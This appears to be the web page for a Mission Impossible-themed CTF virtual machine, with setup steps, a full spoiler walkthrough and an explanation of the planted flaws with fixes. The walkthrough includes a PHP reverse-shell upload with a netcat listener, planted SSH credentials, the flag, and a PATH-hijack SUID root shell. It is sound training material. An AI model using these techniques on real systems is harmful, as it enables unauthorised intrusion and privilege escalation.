🎯 PROJECT MISSION IMPOSSIBLE 🎯

"Your mission, should you choose to accept it..."

A Capture The Flag (CTF) Challenge for Penetration Testing Practice

📋 About the Challenge

Project Mission Impossible is a vulnerable virtual machine designed for cybersecurity training and penetration testing practice. Inspired by the Mission Impossible movie franchise, this CTF challenge offers a story-driven hacking experience with multiple exploitation phases.

  • 🎬 Story-Driven: Immersive Mission Impossible themed narrative throughout the challenge
  • 🎓 Educational: Learn web exploitation, privilege escalation, and more
  • Beginner-Friendly: Perfect for those new to penetration testing

Challenge Information

  • Difficulty: Beginner to Intermediate (EASY)
  • Type: Boot2Root CTF
  • Platform: VirtualBox (.ova format)
  • OS: Debian 13 (Trixie)
  • File Size: ~2.5 GB
  • Network: Bridged or Host-Only

📖 The Mission Story

Welcome to the Impossible Missions Force (IMF). You've been assigned to investigate a compromised secure network containing classified operations spanning multiple missions.

Phase 1: Mission Impossible (1996)

Location: Prague, Czech Republic

Your first objective is to infiltrate the IMF network through their web portal on port 8080. Intelligence suggests there's a vulnerability in their file upload system that could grant you initial access.

Phase 2: Ghost Protocol (2011)

Location: Multiple (Moscow, Dubai, Mumbai)

After gaining initial access as Agent Ethan Hunt, you must investigate the Ghost Protocol server on port 8081. Hidden within the classified files are credentials for Luther Stickell, the IMF's technical specialist.

Phase 3: Rogue Nation (2015)

Location: System Level Access

As Luther Stickell, you've discovered that Agent Ilsa Faust has left behind a powerful tool. Your mission is to find and exploit this tool to escalate your privileges to root level.

Phase 4: The Final Reckoning

Objective: Capture the Flag

With root access achieved, you can finally access the classified final mission briefing and capture the ultimate flag, proving you've mastered the impossible.

⬇️ Download Challenge

⚠️ SECURITY WARNING ⚠️

This virtual machine contains INTENTIONAL VULNERABILITIES for educational purposes.

Only use in isolated lab environments. Never expose to the internet!

Download Options

📥 DOWNLOAD FROM GOOGLE DRIVE

File Information:

  • Filename: Project_Mission_Impossible.ova
  • Size: Approximately 2.5 GB
  • MD5 Checksum: [Generate after upload]
  • Format: Open Virtualization Format (.ova)

Alternative Download

If Google Drive is slow, you can also download from:

⚙️ Setup Instructions

Step 1: Prerequisites

Before you begin, ensure you have:

  • VirtualBox installed (Version 6.0 or higher)
  • Kali Linux or another penetration testing OS
  • At least 4GB RAM and 20GB disk space available
  • Basic understanding of Linux command line
  • Familiarity with penetration testing tools (nmap, netcat, etc.)

Step 2: Import OVA File

  1. Download the Project_Mission_Impossible.ova file
  2. Open VirtualBox
  3. Go to File → Import Appliance
  4. Click the folder icon and select the downloaded .ova file
  5. Review the settings (2GB RAM, 2 CPU cores recommended)
  6. Click Import and wait for the process to complete

Note: The import process may take 5-10 minutes depending on your system.

Step 3: Network Configuration

Choose one of these network modes:

Option A: Bridged Adapter (Recommended for Beginners)

  1. Right-click the VM → Settings
  2. Go to Network tab
  3. Change "Attached to" to Bridged Adapter
  4. Click OK

The VM will get an IP from your router (e.g., 192.168.1.x) and will be reachable from other devices on that network.

Option B: Host-Only Adapter (Isolated Lab)

  1. In VirtualBox: File → Host Network Manager
  2. Create a new host-only network if needed
  3. VM Settings → Network → Choose Host-Only Adapter

The VM will be isolated from your home network

Step 4: Start the Machine

  1. Select the Project Mission Impossible VM
  2. Click Start
  3. Wait for the system to boot (approximately 30 seconds)
  4. The system will display the login screen

Find the IP Address:

Log in with any user account (or check the VirtualBox VM window) to see the IP address. You can also scan your network:

nmap -sn 192.168.1.0/24

Step 5: Begin Your Mission

From your Kali Linux or attacking machine:

# Scan the target
nmap -sV -sC -p- <TARGET_IP>

# Visit the web interface
firefox http://<TARGET_IP>

Your mission begins at port 80. Follow the clues and good luck, Agent! 🎯

🚀 Complete Walkthrough

⚠️ SPOILER ALERT ⚠️

This section contains the complete solution. Try solving it yourself first!

Phase 1: Reconnaissance & Initial Access

Step 1: Port Scanning

nmap -sV -sC -p- <TARGET_IP> -oN scan.txt

Expected Results:

  • Port 22 (SSH)
  • Port 80 (HTTP)
  • Port 8080 (HTTP - Mission Impossible)
  • Port 8081 (HTTP - Ghost Protocol)
  • Port 21 (FTP)
  • Port 110, 143 (POP3, IMAP)

Step 2: Web Enumeration

Visit http://<TARGET_IP> - You'll find a hint pointing to port 8080.

Step 3: Explore Mission Impossible Website

Navigate to http://<TARGET_IP>:8080

  • Explore all 10 buttons/links
  • Read mission briefs (mission1.php, mission2.php, mission3.php)
  • Find the upload.php page

Step 4: Exploit File Upload Vulnerability

Create a PHP reverse shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

# Edit the file and set your IP and port
nano php-reverse-shell.php
# Change: $ip = 'YOUR_KALI_IP';
# Change: $port = 4444;

Step 5: Get Reverse Shell

# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Upload shell.php via upload.php
# Then access: http://<TARGET_IP>:8080/uploads/shell.php

Step 6: Find Credentials

# In your reverse shell:
cat /var/www/uploads/.secret_clue.txt

# Output:
# Username: ethan_hunt
# Password: IMF_Protocol_2024

Phase 2: Lateral Movement (ethan_hunt)

Step 1: SSH as ethan_hunt

ssh ethan_hunt@<TARGET_IP>
# Password: IMF_Protocol_2024

Step 2: Read Mission Briefing

cat ~/MISSION_BRIEFING.txt

The briefing mentions Ghost Protocol on port 8081.

Step 3: Explore Ghost Protocol Website

Visit http://<TARGET_IP>:8081 in your browser.

  • Explore all 5 pages
  • Pay special attention to ethan_personal.php

Step 4: View Page Source

Right-click on ethan_personal.php → View Page Source

Scroll to the bottom to find hidden credentials in HTML comments:

Phase 3: Privilege Escalation (luther_stickell)

Step 1: SSH as luther_stickell

ssh luther_stickell@<TARGET_IP>
# Password: HackerInChief_1996

Step 2: Read Next Mission

cat ~/NEXT_MISSION.txt

Step 3: Search for SUID Binaries

find / -perm -4000 2>/dev/null

Look for unusual binaries. You should find:

/tmp/secret_mission
# or
/usr/local/bin/secret_mission

Step 4: Execute SUID Binary

/tmp/secret_mission

This binary runs with root privileges and displays the final mission file!

Phase 4: Root Access & Flag Capture

Capture the Flag

After executing the SUID binary, you'll see the contents of /root/FINAL_MISSION.txt

The Flag:

IMF{M1SS10N_1MP0SS1BL3_C0MPL3T3D_Y0U_4R3_TH3_M4ST3R_4G3NT}

Alternative: Get Root Shell

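For a root shell instead of just reading the file, shadow cat through PATH as shown below. This depends on the binary running cat by bare name; the listing under "Vulnerabilities Explained" calls /bin/cat by absolute path, which a PATH change does not affect.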

# Create malicious 'cat' binary
cd /tmp
echo '#!/bin/bash' > cat
echo '/bin/bash -p' >> cat
chmod +x cat

# Modify PATH
export PATH=/tmp:$PATH

# Execute SUID binary
/tmp/secret_mission

# You now have a root shell!
whoami  # Output: root

Mission Complete! 🎯

Congratulations, Agent! You've successfully completed all phases of Project Mission Impossible.

Attack Chain Summary

  1. 🔍 Port scan reveals web services on ports 80, 8080, 8081
  2. 🌐 Port 80 hints at port 8080
  3. 📤 File upload vulnerability on port 8080 (upload.php)
  4. 🐚 Upload PHP reverse shell → Initial access as www-data
  5. 🔑 Find credentials in .secret_clue.txt → ethan_hunt:IMF_Protocol_2024
  6. 🔐 SSH as ethan_hunt
  7. 🌐 Discover Ghost Protocol on port 8081
  8. 👀 View source code → Find luther_stickell:HackerInChief_1996
  9. 🔐 SSH as luther_stickell
  10. 🔎 Find SUID binary → /tmp/secret_mission
  11. ⚡ Execute SUID binary → Root access
  12. 🚩 Capture flag!

🔓 Vulnerabilities Explained

1. Unrestricted File Upload (CRITICAL)

Location: /upload.php on port 8080

Description: The file upload functionality accepts any file type without validation, allowing attackers to upload malicious PHP scripts.

Vulnerable Code:

<?php
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    // NO FILE TYPE VALIDATION!
    echo "File uploaded successfully!";
}
?>

Fix:

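<?php
// $target_file is built earlier in upload.php (not shown on this page).
$allowed_types = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
$allowed_mimes = array('image/jpeg', 'image/png', 'image/gif', 'application/pdf');
$file_ext = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

// Reject anything whose extension is not on the allowlist
if (!in_array($file_ext, $allowed_types, true)) {
    die("Invalid file type!");
}

// Also check MIME type, detected from the file contents rather than
// trusted from the client-supplied Content-Type
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES["fileToUpload"]["tmp_name"]);
if (!in_array($mime, $allowed_mimes, true)) {
    die("Invalid file type!");
}

// Only move the file into place after both checks pass
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    echo "File uploaded successfully!";
}
?>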

2. Information Disclosure (HIGH)

Location: HTML source code comments

Description: Sensitive credentials are stored in HTML comments, visible to anyone viewing page source.

Vulnerable Code:

<!--
  Username: luther_stickell
  Password: HackerInChief_1996
-->

Fix:

  • Never store credentials in client-side code
  • Remove all sensitive comments before deployment
  • Use environment variables for credentials
  • Implement proper authentication mechanisms

3. SUID Binary Misconfiguration (CRITICAL)

Location: /tmp/secret_mission (or /usr/local/bin/secret_mission)

Description: A binary owned by root with SUID bit set executes system commands, allowing privilege escalation.

Vulnerable Code:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);  // Set UID to root
    setgid(0);  // Set GID to root
    system("/bin/cat /root/FINAL_MISSION.txt");  // Execute as root
    return 0;
}

Fix:

  • Avoid using SUID binaries when possible
  • Never use system() in SUID programs
  • Use execve() with full paths instead
  • Implement proper input validation
  • Drop privileges as soon as possible
  • Regular SUID audit: find / -perm -4000 2>/dev/null

4. Weak Password Policy (MEDIUM)

Description: User accounts have predictable or weak passwords.

Examples:

  • ethan_hunt:IMF_Protocol_2024
  • luther_stickell:HackerInChief_1996

Fix:

  • Enforce strong password policies (minimum 12 characters, complexity requirements)
  • Implement multi-factor authentication (MFA)
  • Use SSH key-based authentication instead of passwords
  • Regular password rotation
  • Monitor for failed login attempts

Learning Objectives

By completing this challenge, you will learn:

  • ✅ How to perform network reconnaissance with nmap
  • ✅ Web application enumeration techniques
  • ✅ File upload vulnerability exploitation
  • ✅ Reverse shell creation and usage
  • ✅ Linux privilege escalation via SUID binaries
  • ✅ Information gathering and lateral movement
  • ✅ Source code analysis for credentials
  • ✅ Post-exploitation techniques

🛠️ Required Tools

  • 🔍 Nmap: Network scanning and port discovery (apt install nmap)
  • 🌐 Gobuster: Directory/file brute-forcing (apt install gobuster)
  • 🐚 Netcat: Reverse shell listener (apt install netcat)
  • 🔐 SSH Client: Remote access (apt install openssh-client)
  • 🦊 Firefox/Burp: Web application testing (pre-installed on Kali)
  • 📝 Text Editor: Edit reverse shells (nano / vim)

❓ Frequently Asked Questions

Can't find the VM's IP address?

Try these methods:

  1. Log in to the VM console and run: ip addr show
  2. From Kali, scan your network: nmap -sn 192.168.1.0/24
  3. Use arp-scan -l to discover all devices
  4. Check your router's DHCP client list

Reverse shell not connecting?

Troubleshooting steps:

  1. Verify your IP address in the PHP shell is correct
  2. Check firewall on your Kali machine: sudo ufw status
  3. Ensure netcat listener is running: nc -lvnp 4444
  4. Try accessing via browser: http://<TARGET_IP>:8080/uploads/shell.php
  5. Check Apache error logs on the VM for PHP errors

Can't find the SUID binary?

The binary might be in multiple locations:

# Try these locations:
ls -la /tmp/secret_mission
ls -la /usr/local/bin/secret_mission
ls -la /home/ilsa_faust/secret_mission

# Search for it:
find / -name "secret_mission" 2>/dev/null
find / -perm -4000 2>/dev/null | grep secret

What if I get stuck?

Don't worry! Here are some hints:

  • Read all mission briefing files carefully - they contain hints
  • Always view page source on web pages
  • Check .bash_history files for clues
  • Look for hidden files with ls -la
  • Refer to the complete walkthrough above

Is this machine safe to run?

This machine contains intentional vulnerabilities and should only be used in isolated lab environments:

  • ✅ Safe: Running on VirtualBox with Host-Only or NAT network
  • ✅ Safe: Running in isolated home lab with no internet access
  • ❌ Unsafe: Exposing to the internet or production networks
  • ❌ Unsafe: Running on public cloud without proper isolation

Always use responsible disclosure practices in real-world scenarios!

📧 Contact & Feedback

Did you enjoy this challenge? Have suggestions or found bugs?

I'd love to hear from you!

🐙 GitHub: https://github.com/ahammednizar

🐦 Twitter: @X

💼 LinkedIn: www.linkedin.com/in/ahammed-nizar-a36853137

Share Your Writeup!

Completed the challenge? Share your writeup with the community!

Tag it with: #ProjectMissionImpossible #CTF #Pentesting

🏆 Credits & Acknowledgments

Created by: [ahammed nizar]

Inspired by: Mission Impossible film franchise, VulnHub, TryHackMe

Special Thanks:

  • 🎬 Mission Impossible franchise for the amazing storylines
  • 🛡️ VulnHub & TryHackMe for CTF inspiration
  • 🐚 Pentestmonkey for the PHP reverse shell
  • 🐧 Debian project for the base OS
  • 🌐 Apache, PHP, and open-source community

Disclaimer:

This vulnerable machine is created purely for educational purposes. The author is not responsible for any misuse. Always obtain proper authorization before testing security on systems you don't own. Practice ethical hacking and responsible disclosure.